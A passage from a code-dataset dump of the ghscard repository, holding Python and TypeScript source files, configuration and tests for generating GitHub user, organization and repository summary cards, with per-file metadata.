emoji = emoji.strip().strip(\":\")\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n return cast(str, self.__emoji_mapping.get(emoji))\n\n def parse(self, text: str) -> list:\n emoji_list = []\n\n try:\n for emoji_candidate in self.__re_emoji.findall(text):\n emoji_candidate = emoji_candidate.strip(\":\")\n\n if emoji_candidate in self.__emoji_mapping:\n emoji_list.append(emoji_candidate)\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n return emoji_list\n" }, { "alpha_fraction": 0.517524242401123, "alphanum_fraction": 0.517524242401123, "avg_line_length": 22.946428298950195, "blob_id": "d65e011e083453602fd82d33fdf692a7e702dedd", "content_id": "17a75471eccbeae307da6040ed6528a1b1e8e7be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1341, "license_type": "permissive", "max_line_length": 84, "num_lines": 56, "path": "/webpack.config.js", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "const path = require(\"path\");\nconst BundleAnalyzerPlugin = require(\"webpack-bundle-analyzer\").BundleAnalyzerPlugin\nconst TerserPlugin = require(\"terser-webpack-plugin\");\n\nmodule.exports = (env, argv) => {\n const IS_DEVELOPMENT = argv.mode === \"development\";\n\n return {\n entry: path.join(__dirname, \"src\", \"main.ts\"),\n output: {\n library: \"ghscard\",\n libraryTarget: \"umd\",\n path: path.join(__dirname, \"dist\"),\n filename: IS_DEVELOPMENT ? \"ghscard.js\" : \"ghscard.min.js\"\n },\n devtool: IS_DEVELOPMENT ? \"source-map\" : \"none\",\n externals: {\n jquery: \"jQuery\"\n },\n plugins: [\n new BundleAnalyzerPlugin({\n analyzerMode: \"disabled\",\n generateStatsFile: true,\n statsFilename: IS_DEVELOPMENT ? \"stats-dev.json\" : \"stats.json\",\n statsOptions: { source: false }\n })\n ],\n optimization: {\n minimizer: IS_DEVELOPMENT\n ? []\n : [\n new TerserPlugin({\n terserOptions: {\n compress: { drop_console: true },\n },\n extractComments: \"all\",\n })\n ]\n },\n module: {\n rules: [{\n test: /\\.ts$/,\n use: \"ts-loader\"\n }]\n },\n resolve: {\n modules: [\n \"node_modules\",\n ],\n extensions: [\n \".ts\",\n \".js\"\n ]\n }\n }\n};\n" }, { "alpha_fraction": 0.6236323714256287, "alphanum_fraction": 0.6236323714256287, "avg_line_length": 21.850000381469727, "blob_id": "2ba39b30209ee79c6d520aa052273e351b101468", "content_id": "f29bd4aac52abae3b8f00644ea8a1ccc95aab6d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 457, "license_type": "permissive", "max_line_length": 65, "num_lines": 20, "path": "/src/card/organization/small.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class SmallOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"small\";\n }\n\n protected get infoSize(): UiSize {\n return \"small\";\n }\n\n protected get popupSize(): UiSize {\n return \"small\";\n }\n\n protected get avatarColumnWide(): string {\n return \"six\";\n }\n}\n" }, { "alpha_fraction": 0.5795454382896423, "alphanum_fraction": 0.5795454382896423, "avg_line_length": 87, "blob_id": "6161456c4c78115a5e6db698c95645a4e726cc92", "content_id": "53afda95a77a7ab9f739c828f74684b4e5140c21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "permissive", "max_line_length": 87, "num_lines": 1, "path": "/ghscard/__init__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "from .__version__ import __author__, __copyright__, __email__, __license__, __version__\n" }, { "alpha_fraction": 0.627457857131958, "alphanum_fraction": 0.6436095237731934, "avg_line_length": 36.973331451416016, "blob_id": "149095ede547e742a4a9d4c8a01be3b298d44372", "content_id": "8bf0b5a577b10f0caebe85b77acdf3fb7f15aa93", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 112, "num_lines": 75, "path": "/src/const.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export const AVATAR_ELEMENT_ID = \"__avatar_id__\";\nexport const CARD_ELEMENT_ID = \"__card_id__\";\n\nexport namespace Margin {\n export const CARD_CONTENT = 4;\n export const FRAME = 6;\n export const LABEL = 4;\n}\n\nconst CDNJS_PREFIX = \"//cdnjs.cloudflare.com/ajax/libs\";\nconst JSDELIVR_PREFIX = \"//cdn.jsdelivr.net/npm\";\nconst UI_VERSION = \"2.8.6\";\n\nexport namespace JsUrl {\n export const CHART = `${JSDELIVR_PREFIX}/[email protected]/dist/Chart.min.js`;\n export const JQUERY = `${CDNJS_PREFIX}/jquery/3.5.1/jquery.min.js`;\n export const MOMENT = `${CDNJS_PREFIX}/moment.js/2.24.0/moment.min.js`;\n export const PLEASE = `${CDNJS_PREFIX}/pleasejs/0.4.2/Please.min.js`;\n export const SEMANTIC_UI: string = `${JSDELIVR_PREFIX}/fomantic-ui@${UI_VERSION}/dist/semantic.min.js`;\n}\n\nexport const DEFAULT_SEMANTIC_UI_CSS_URL = `${JSDELIVR_PREFIX}/fomantic-ui@${UI_VERSION}/dist/semantic.min.css`;\n\nexport namespace Emoji {\n export const WIDTH = 16;\n export const HEIGHT = 16;\n}\n\nconst STEP_HEIGHT = 20;\n\nnamespace BaseChartSize {\n export namespace Line {\n export const HEIGHT = 110;\n export const TITLE_FONT_SIZE = 10;\n export const TICK_FONT_SIZE = 8;\n }\n export namespace Pie {\n export const HEIGHT = 160;\n export const LEGEND_FONT_SIZE = 10;\n }\n}\n\nexport namespace ChartSize {\n export namespace Line {\n export namespace Medium {\n export const HEIGHT = BaseChartSize.Line.HEIGHT + STEP_HEIGHT * 2;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE + 2;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE + 2;\n }\n export namespace Small {\n export const HEIGHT = BaseChartSize.Line.HEIGHT + STEP_HEIGHT * 1;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE + 1;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE + 1;\n }\n export namespace Tiny {\n export const HEIGHT = BaseChartSize.Line.HEIGHT;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE;\n }\n }\n export namespace Pie {\n export namespace Medium {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT * 2;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE + 2;\n }\n export namespace Small {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT * 1;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE + 1;\n }\n export namespace Tiny {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE;\n }\n }\n}\n" }, { "alpha_fraction": 0.5766423344612122, "alphanum_fraction": 0.5766423344612122, "avg_line_length": 14.222222328186035, "blob_id": "0a7cc86bf72ba694d33fafaf6c57e53013d79835", "content_id": "ffde70ec0688e1c78c03e6c04263e39240349e83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "permissive", "max_line_length": 44, "num_lines": 9, "path": "/ghscard/_error.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\n\nclass ApiStatusError(Exception):\n \"\"\"\n Raised when GitHub API is in red status.\n \"\"\"\n" }, { "alpha_fraction": 0.6909090876579285, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 26.5, "blob_id": "9e3b0ed196514577088b312558adbc8fb947aded", "content_id": "6cb8522ad7e648570172f8ca7dae040e5e343cbb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 55, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/docs/pages/usage/index.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. include:: usage.rst\n.. include:: advanced_usage.rst\n" }, { "alpha_fraction": 0.610088586807251, "alphanum_fraction": 0.6121336221694946, "avg_line_length": 24.29310417175293, "blob_id": "2caf71669dcb10a14d6415939d869e583599dc76", "content_id": "651463bfcaa1e49b33c33f391693c03082716654", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "permissive", "max_line_length": 98, "num_lines": 58, "path": "/ghscard/fetcher/_common.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom typing import Counter, Dict, Union\n\nfrom .._const import CommonCardKey\n\n\nChartData = Dict[str, list]\n\n\ndef dump_organization(organization) -> Dict[str, str]:\n if not organization:\n return {}\n\n if organization.name:\n organization_name = organization.name\n else:\n organization_name = organization.html_url.split(\"/\")[-1]\n\n return {\n CommonCardKey.AVATAR_URL: organization.avatar_url,\n CommonCardKey.HTML_URL: organization.html_url,\n CommonCardKey.NAME: organization_name,\n \"public_repos\": organization.public_repos,\n }\n\n\ndef to_chart_data(\n label_count_mapping: Union[Counter, Dict[str, int]], aggregate_threshold: int\n) -> ChartData:\n if not label_count_mapping:\n return {\"labels\": [], \"data\": []}\n\n label_name_list = []\n label_count_list = []\n others_count = None\n\n for i, kv in enumerate(sorted(label_count_mapping.items(), key=lambda x: x[1], reverse=True)):\n key, value = kv\n\n if (i + 1) > aggregate_threshold:\n if others_count is None:\n others_count = value\n else:\n others_count += value\n\n continue\n\n label_name_list.append(key)\n label_count_list.append(value)\n\n if others_count:\n label_name_list.append(\"others\")\n label_count_list.append(others_count)\n\n return {\"labels\": label_name_list, \"data\": label_count_list}\n" }, { "alpha_fraction": 0.5443708896636963, "alphanum_fraction": 0.573509931564331, "avg_line_length": 14.729166984558105, "blob_id": "3b286285444e9ea5925ca90339cd3acd1f897b7e", "content_id": "da2a083629960c58f704c214b6743a2354da8150", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 755, "license_type": "permissive", "max_line_length": 59, "num_lines": 48, "path": "/pyproject.toml", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "[build-system]\nrequires = [\"setuptools\", \"wheel\"]\n\n[tool.black]\nline-length = 100\nexclude = '''\n/(\n \\.eggs\n | \\.git\n | \\.mypy_cache\n | \\.tox\n | \\.venv\n | \\.pytype\n | _build\n | buck-out\n | build\n | dist\n)/\n| docs/conf.py\n'''\ntarget-version = ['py37', 'py38', 'py39', 'py310', 'py311']\n\n[tool.isort]\nknown_third_party = [\n 'appconfigpy',\n 'github',\n 'logbook',\n 'pytest',\n 'retryrequests',\n]\ninclude_trailing_comma = true\nline_length = 100\nlines_after_imports = 2\nmulti_line_output = 3\nskip_glob = [\n '*/.eggs/*',\n '*/.pytype/*',\n '*/.tox/*',\n]\n\n[tool.mypy]\nignore_missing_imports = true\npython_version = 3.7\n\npretty = true\nshow_error_codes = true\nshow_error_context = true\nwarn_unused_configs = true\n" }, { "alpha_fraction": 0.5844678282737732, "alphanum_fraction": 0.6178836822509766, "avg_line_length": 37.93975830078125, "blob_id": "84b558f1343f1057db13373a22e5ddae3e3aa7d6", "content_id": "ed223f12d8756791296324a15d1daa11190789d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3232, "license_type": "permissive", "max_line_length": 97, "num_lines": 83, "path": "/test/test_emoji.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport pytest\n\nfrom ghscard._emoji import EmojiParser\n\n\nemojis = {\n \"+1\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f44d.png?v7\",\n \"-1\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f44e.png?v7\",\n \"100\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f4af.png?v7\",\n \"1234\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f522.png?v7\",\n \"1st_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n \"2nd_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f948.png?v7\",\n \"3rd_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f949.png?v7\",\n \"8ball\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f3b1.png?v7\",\n \"a\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f170.png?v7\",\n \"ab\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f18e.png?v7\",\n \"abc\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f524.png?v7\",\n \"abcd\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f521.png?v7\",\n \"accept\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f251.png?v7\",\n \"aerial_tramway\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f6a1.png?v7\",\n \"afghanistan\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f1e6-1f1eb.png?v7\",\n \"airplane\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/2708.png?v7\",\n}\n\n\[email protected]\ndef emoji_parser():\n return EmojiParser(emojis)\n\n\nclass Test_Emoji_constructor:\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n EmojiParser(value)\n\n\nclass Test_Emoji_parse:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\":+1:\", [\"+1\"]],\n [\"a:-1:b\", [\"-1\"]],\n [\"a:-1:b:accept:c\", [\"-1\", \"accept\"]],\n [\"\", []],\n [\":\", []],\n [\":+1\", []],\n ],\n )\n def test_normal(self, emoji_parser, value, expected):\n assert emoji_parser.parse(value) == expected\n\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError], [1, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n emoji_parser.parse(value)\n\n\nclass Test_Emoji_get_url:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\n \"1st_place_medal\",\n \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n ],\n [\n \":1st_place_medal:\",\n \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n ],\n ],\n )\n def test_normal(self, emoji_parser, value, expected):\n assert emoji_parser.get_url(value) == expected\n\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError], [1, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n emoji_parser.get_url(value)\n" }, { "alpha_fraction": 0.6658768057823181, "alphanum_fraction": 0.6658768057823181, "avg_line_length": 20.100000381469727, "blob_id": "2b6241be627d5bd94e7c585b1baf815ccd94f6fc", "content_id": "e5f58ddc54425216fc0b9c28933d558f055c5d09", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "permissive", "max_line_length": 93, "num_lines": 20, "path": "/ghscard/_stopwatch.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport contextlib\nimport datetime\n\nfrom ._const import DATETIME_FORMAT\n\n\[email protected]\ndef stopwatch(logger, name):\n start_time = datetime.datetime.now()\n\n logger.debug(f\"start {name:s}: {start_time.strftime(DATETIME_FORMAT):s}\")\n\n try:\n yield\n finally:\n logger.debug(f\"complete {name:s}: time={datetime.datetime.now() - start_time} [sec]\")\n" }, { "alpha_fraction": 0.662665843963623, "alphanum_fraction": 0.6632975339889526, "avg_line_length": 37.60975646972656, "blob_id": "25c6a2eaf934cf5467ffb01c6b8e5e5bdb7c43d4", "content_id": "981e663140457f97750bd7df80008099af76f7ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "permissive", "max_line_length": 92, "num_lines": 41, "path": "/ghscard/fetcher/_organization.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\n\nfrom .._const import DATETIME_FORMAT, CardType, CommonCardKey\nfrom ._base import AbstractCardDataFetcher, CardData\n\n\nclass OrganizationCardDataFetcher(AbstractCardDataFetcher):\n @property\n def type(self) -> str:\n return CardType.ORGANIZATION\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching org data: id={self.id}\")\n\n card_data = super().fetch()\n org = self._pygh_client.get_organization(self.id)\n description = self.__get_description()\n\n card_data[CommonCardKey.AVATAR_URL] = org.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.ORGANIZATION\n card_data[CommonCardKey.CREATED_AT] = org.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = description\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(description)\n card_data[CommonCardKey.HTML_URL] = org.html_url\n card_data[CommonCardKey.NAME] = self.id\n card_data[CommonCardKey.UPDATED_AT] = org.updated_at.strftime(DATETIME_FORMAT)\n card_data[\"blog\"] = org.blog\n card_data[\"company\"] = org.company\n card_data[\"email\"] = org.email\n card_data[\"location\"] = org.location\n card_data[\"public_gists\"] = org.public_gists\n card_data[\"public_repos\"] = org.public_repos\n card_data[\"public_members_count\"] = sum([1 for _member in org.get_public_members()])\n\n return card_data\n\n def __get_description(self):\n return self._ghc_client.get(f\"/orgs/{self.id:s}\").get(\"description\")\n" }, { "alpha_fraction": 0.6427289247512817, "alphanum_fraction": 0.6427289247512817, "avg_line_length": 23.755556106567383, "blob_id": "e896e7688f10fdc3531877c1f3e551e2a97883b2", "content_id": "2b699fcca3bf9cd4e7dc213cdb08e43e957a0323", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1114, "license_type": "permissive", "max_line_length": 74, "num_lines": 45, "path": "/src/card/repository/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class MediumRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"large\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"medium\";\n }\n\n protected get topicSize(): UiSize {\n return \"small\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Medium.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Medium.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): number {\n return ChartSize.Pie.Medium.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Medium.TITLE_FONT_SIZE;\n }\n\n protected get chartTickFontSize(): number {\n return ChartSize.Line.Medium.TICK_FONT_SIZE;\n }\n}\n" }, { "alpha_fraction": 0.5289430618286133, "alphanum_fraction": 0.5324584245681763, "avg_line_length": 34.55833435058594, "blob_id": "6215010d92ed39aeb56464b98b4e6e523f77d965", "content_id": "fc371ada4362af089b15f56dce4020721bb66268", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 4269, "license_type": "permissive", "max_line_length": 104, "num_lines": 120, "path": "/src/manager.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeratorInterface } from \"./card/interface\";\nimport { Margin } from \"./const\";\nimport { EmojiProcessorFactory } from \"./emoji\";\nimport { createCardGenerator } from \"./factory\";\nimport { CardStyle } from \"./types\";\n\nimport $ from \"jquery\";\n\nnamespace CardAttr {\n export namespace Display {\n export const CHART = \"chart-display\"; // only for repository\n export const TOPICS = \"topic-display\"; // only for repository\n }\n\n export const EMOJI = \"emoji\";\n export const FRAME_COLOR = \"color\";\n export const STYLE = \"card-style\";\n export const WIDTH = \"card-width\";\n}\n\nconst DEFAULT_CARD_WIDTH_MAPPING = {\n medium: 420,\n small: 380,\n tiny: 340,\n};\nconst DEFAULT_CARD_STYLE: CardStyle = \"medium\";\n\nexport class CardGeneratorManager {\n constructor(private _doc: Document) {}\n\n public generateCards(): void {\n console.debug(navigator.userAgent);\n let frameCount = 0;\n\n Array.prototype.forEach.call(this._doc.getElementsByClassName(\"ghscard\"), (cardElement) => {\n const dataSourcePath: string = cardElement.getAttribute(\"src\");\n let cardStyle: CardStyle;\n\n if (cardElement.getAttribute(CardAttr.STYLE) !== null) {\n cardStyle = cardElement.getAttribute(CardAttr.STYLE);\n } else {\n console.debug(`${CardAttr.STYLE} attribute not found`);\n cardStyle = DEFAULT_CARD_STYLE;\n }\n\n $.getJSON(dataSourcePath, (cardData) => {\n console.info(`--- creating a GitHub card from ${dataSourcePath} ---`);\n console.debug(cardData);\n\n const cardGenerator: CardGeratorInterface = createCardGenerator(\n this._doc,\n cardStyle,\n cardData,\n this.getIframeWidth(cardElement.getAttribute(CardAttr.WIDTH), cardStyle),\n cardElement.getAttribute(CardAttr.FRAME_COLOR),\n cardElement.getAttribute(CardAttr.Display.CHART),\n cardElement.getAttribute(CardAttr.Display.TOPICS),\n EmojiProcessorFactory.create(\n cardElement.getAttribute(CardAttr.EMOJI),\n cardData[\"emojis\"]\n )\n );\n\n if (cardGenerator == null) {\n console.error(`skip invalid card data: ${dataSourcePath}`);\n return;\n }\n\n const cardFrame = cardGenerator.createCard(frameCount);\n\n frameCount++;\n cardElement.parentNode.insertBefore(cardFrame, cardElement);\n $(cardFrame).on(\"load\", () => {\n const card = cardFrame.contentWindow.document.getElementsByTagName(\"div\")[0];\n\n if (card === undefined) {\n return;\n }\n\n // tslint:disable-next-line\n // cardFrame.height = `${card.getBoundingClientRect().height + Margin.FRAME * 2}px`;\n cardFrame.height = `${card.getBoundingClientRect().height + Margin.FRAME}px`;\n cardFrame.style.visibility = \"visible\";\n });\n }).fail((jqXHR, textStatus, errorThrown) => {\n console.error(\n [\n `failed to execute getJSON: ${textStatus}`,\n `path: ${dataSourcePath}`,\n `error: ${errorThrown}`,\n `response:${jqXHR.responseText}`,\n ].join(\"\\n\")\n );\n });\n });\n }\n\n private getIframeWidth(cardWidth: string, cardStyle: CardStyle): number {\n let iframeWidth: number;\n\n if (cardWidth === null) {\n iframeWidth = DEFAULT_CARD_WIDTH_MAPPING[cardStyle];\n } else {\n iframeWidth = Number(cardWidth);\n }\n\n return iframeWidth;\n }\n\n /*\n private appendCardCss(cardId: string): void {\n this._doc.head.appendChild(this.createCssElement(\n this._doc, `#${cardId} .ui.card {\n position: fixed;\n height:100%;\n }`));\n // overflow: hidden;\n }\n */\n}\n" }, { "alpha_fraction": 0.6151100397109985, "alphanum_fraction": 0.6180844902992249, "avg_line_length": 27.982759475708008, "blob_id": "3e21db94587f8a60001bd5063b0a096c09d85ac6", "content_id": "46becd6b9fd77b0484b8eeb820d0088c1383223e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1681, "license_type": "permissive", "max_line_length": 97, "num_lines": 58, "path": "/ghscard/_cache.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom functools import total_ordering\nfrom typing import Union\n\nfrom datetimerange import DateTimeRange\nfrom path import Path\n\n\n@total_ordering\nclass CacheTime:\n @property\n def second(self) -> Union[int, float]:\n return self.__second\n\n @property\n def hour(self) -> float:\n return self.second / (60**2)\n\n def __init__(self, second: Union[int, float]):\n self.__second = second\n\n def __eq__(self, other) -> bool:\n return self.second == other.second\n\n def __lt__(self, other) -> bool:\n return self.second < other.second\n\n\nclass CacheManager:\n def __init__(self, logger, cache_lifetime: CacheTime) -> None:\n self.__logger = logger\n self.__cache_lifetime = cache_lifetime\n\n def is_cache_available(self, cache_file_path: Path) -> bool:\n if not cache_file_path.isfile():\n self.__logger.debug(f\"cache not found: {cache_file_path}\")\n return False\n\n try:\n dtr = DateTimeRange(datetime.fromtimestamp(cache_file_path.mtime), datetime.now())\n except OSError:\n return False\n\n if not dtr.is_valid_timerange():\n return False\n\n cache_elapsed = CacheTime(dtr.get_timedelta_second())\n cache_msg = \"path={path}, lifetime={lifetime:.1f}h, elapsed={elapsed:.1f}h\".format(\n path=cache_file_path, lifetime=self.__cache_lifetime.hour, elapsed=cache_elapsed.hour\n )\n\n if cache_elapsed < self.__cache_lifetime:\n self.__logger.debug(f\"cache available: {cache_msg}\")\n return True\n\n self.__logger.debug(f\"cache expired: {cache_msg}\")\n\n return False\n" }, { "alpha_fraction": 0.5757956504821777, "alphanum_fraction": 0.5770519375801086, "avg_line_length": 28.121952056884766, "blob_id": "060a92aeb0f2176833f210e6268f1b6ce7db5fe1", "content_id": "b3c0356d48e4ad0e0eeabae3338f46aebe90e1cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2388, "license_type": "permissive", "max_line_length": 82, "num_lines": 82, "path": "/ghscard/_detector.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport github\nimport typepy\nfrom github.GithubException import UnknownObjectException\n\nfrom ._const import CardType\n\n\nclass GithubIdDetector:\n @property\n def id(self) -> str:\n return self.__id\n\n def __init__(self, id: str, logger, pygh_client: github.Github) -> None:\n try:\n self.__id = id.strip().strip(\"/\")\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n id_item_list = [id_item.strip() for id_item in self.__id.split(\"/\")]\n self.__id = \"/\".join(id_item_list)\n\n if typepy.is_null_string(self.__id):\n raise ValueError(\"id must not be an empty string\")\n\n logger.debug(f\"id: {id}\")\n\n self.__pygh_client = pygh_client\n self.__card_type = self.__get_card_type()\n\n def is_user(self) -> bool:\n return self.get_id_type() == CardType.USER\n\n def is_organization(self) -> bool:\n return self.get_id_type() == CardType.ORGANIZATION\n\n def is_repository(self) -> bool:\n return self.get_id_type() == CardType.REPOSITORY\n\n def get_id_type(self) -> str:\n return self.__card_type\n\n def __get_card_type(self) -> str:\n id_item_list = self.id.split(\"/\")\n\n if len(id_item_list) > 2:\n raise ValueError(\n \"invalid format for a GitHub id: \"\n \"expected='<user name>' or '<user name>/<repo name>', \"\n \"actual='{}'\".format(id)\n )\n\n if len(id_item_list) == 2:\n user_name, repo_name = id_item_list\n self.__validate_user_name(user_name)\n self.__validate_repo_name(repo_name)\n\n return CardType.REPOSITORY\n\n user_name = id_item_list[0]\n self.__validate_user_name(user_name)\n\n try:\n self.__pygh_client.get_organization(self.id)\n return CardType.ORGANIZATION\n except UnknownObjectException:\n pass\n\n return CardType.USER\n\n @staticmethod\n def __validate_user_name(user_name: str) -> None:\n if typepy.is_null_string(user_name):\n raise ValueError(\"user/organization name must not be an empty string\")\n\n @staticmethod\n def __validate_repo_name(repo_name: str) -> None:\n if typepy.is_null_string(repo_name):\n raise ValueError(\"repository name must not be an empty string\")\n" }, { "alpha_fraction": 0.5894150137901306, "alphanum_fraction": 0.5922005772590637, "avg_line_length": 32.24074172973633, "blob_id": "503fdc7ad4a15bcc6cb961b074af45c30baee16e", "content_id": "55b22b458d9c5720587e3f1e1a238778bad5f9b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5385, "license_type": "permissive", "max_line_length": 100, "num_lines": 162, "path": "/ghscard/_generator.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport errno\nimport os.path\nfrom typing import Mapping\n\nimport click\nimport github\nimport msgfy\nimport typepy\nfrom github.GithubException import BadCredentialsException, UnknownObjectException\nfrom path import Path\nfrom pathvalidate import sanitize_filename\n\nfrom ._cache import CacheManager, CacheTime\nfrom ._const import MAX_PER_PAGE, AppConfigKey\nfrom ._detector import GithubIdDetector\nfrom ._github_client import GitHubClient\nfrom ._stopwatch import stopwatch\nfrom .fetcher import (\n AbstractCardDataFetcher,\n OrganizationCardDataFetcher,\n RepositoryCardDataFetcher,\n UserCardDataFetcher,\n)\n\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json # type: ignore\n\n\nclass CardGenerator:\n def __init__(self, logger, app_config: Mapping[str, str], is_overwrite: bool) -> None:\n self.__logger = logger\n self.__access_token = app_config.get(AppConfigKey.GITHUB_API_ACCESS_TOKEN)\n self.__output_dir = Path(app_config.get(AppConfigKey.OUTPUT_DIR))\n self.__indent = app_config.get(AppConfigKey.INDENT)\n\n cache_time = CacheTime(24 * (60**2))\n if is_overwrite:\n cache_time = CacheTime(0)\n self.__cache_manager = CacheManager(logger, cache_time)\n\n if typepy.is_not_null_string(self.__access_token):\n logger.debug(\"access token found in the configuration file\")\n\n self.__pygh_client = github.Github(self.__access_token, 